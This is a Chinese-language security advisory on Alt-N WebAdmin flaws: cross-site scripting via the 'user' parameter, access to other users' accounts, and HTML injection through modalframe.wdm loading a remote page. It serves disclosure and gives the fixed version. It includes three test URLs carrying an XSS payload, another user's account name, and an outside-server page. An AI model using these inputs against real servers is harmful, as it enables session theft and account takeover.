描述：Alt-N's WebAdmin中存在漏洞。远程通过验证的用户可以得到目标用户帐号，并且可以执行跨站脚本攻击。

David A. Perez发现'useredit_account.wdm'脚本对用户提交的输入在'user'参数中验证不充分，导致远程用户可以精心构造URL，当
被目标用户登陆时，将会在目标用户的浏览器上执行任意脚本代码。这个代码将会来源于运行WebAdmin软件的站点，并且将会在站点的安全内容里运行。
结果是，目标用户的cookies（包括验证cookies），目标用户提交的任何与这个站点相关的操作数据，或者以目标用户身份在这个站点上操作都会被这个代码获得。

提供如下测试方法：
http://[target]/WebAdmin/useredit_account.wdm?user=%3Cscript%3Ealert('test')%3C/script% 3E

一个已经通过验证的用户可以调用'useredit_account.wdm'脚本来获得目标目标用户的帐号。
提供如下测试方法：
http://[target]/WebAdmin/useredit_account.wdm?user=otheruser@domain

远程用户可以精心构造URL，当被目标用户登陆时，将会在WebAdmin服务的内容里运行任意HTML。
提供如下测试方法：
http://[target]/WebAdmin/modalframe.wdm?file=http://other_server/page.wdm

解决方法：厂商已经发布修复了漏洞的版本（3.0.4）
可以在下面地址获得：
http://www.altn.com/products/default.asp?product%5Fid=WebAdmin

厂商地址：http;//www.altn.com/products/default.asp?product%5Fid=WebAdmin
漏洞起因：操作控制错误，输入合法性错误
影响系统：所有Windows
发布作者：David_Alonso_Perez <kamborio@gmail.com>